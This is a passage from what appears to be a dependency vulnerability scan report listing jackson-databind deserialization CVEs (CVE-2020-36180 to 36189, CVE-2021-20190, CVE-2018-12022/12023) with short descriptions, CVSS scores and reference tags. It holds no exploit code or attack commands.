af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MITIGATION,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36180 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36181 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36182 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36183 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36184 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36185 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36186 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36187 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36188 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36189 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-20190 suppress
A flaw was found in jackson-databind before 2.9.10.7. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: HIGH (8.3) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:C References:
Vulnerable Software & Versions: (show all )
CVE-2018-12022 suppress
An issue was discovered in FasterXML jackson-databind prior to 2.7.9.4, 2.8.11.2, and 2.9.6. When Default Typing is enabled (either globally or for a specific property), the service has the Jodd-db jar (for database access for the Jodd framework) in the classpath, and an attacker can provide an LDAP service to access, it is possible to make the service execute a malicious payload. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-12022] CWE-502: Deserialization of Untrusted Data OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12022 OSSIndex - https://blog.sonatype.com/jackson-databind-remote-code-execution OSSIndex - https://blog.sonatype.com/jackson-databind-the-end-of-the-blacklist OSSIndex - https://github.com/FasterXML/jackson-databind/issues/2052 af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-12023 suppress
An issue was discovered in FasterXML jackson-databind prior to 2.7.9.4, 2.8.11.2, and 2.9.6. When Default Typing is enabled (either globally or for a specific property), the service has the Oracle JDBC jar in the classpath, and an attacker can provide an LDAP service to access, it is possible to make the service execute a malicious payload. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-12023] CWE-502: Deserialization of Untrusted Data OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12023 OSSIndex - https://blog.sonatype.com/jackson-databind-remote-code-execution OSSIndex - https://blog.sonatype.com/jackson-databind-the-end-of-the-blacklist OSSIndex - https://github.com/FasterXML/jackson-databind/issues/2058 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY 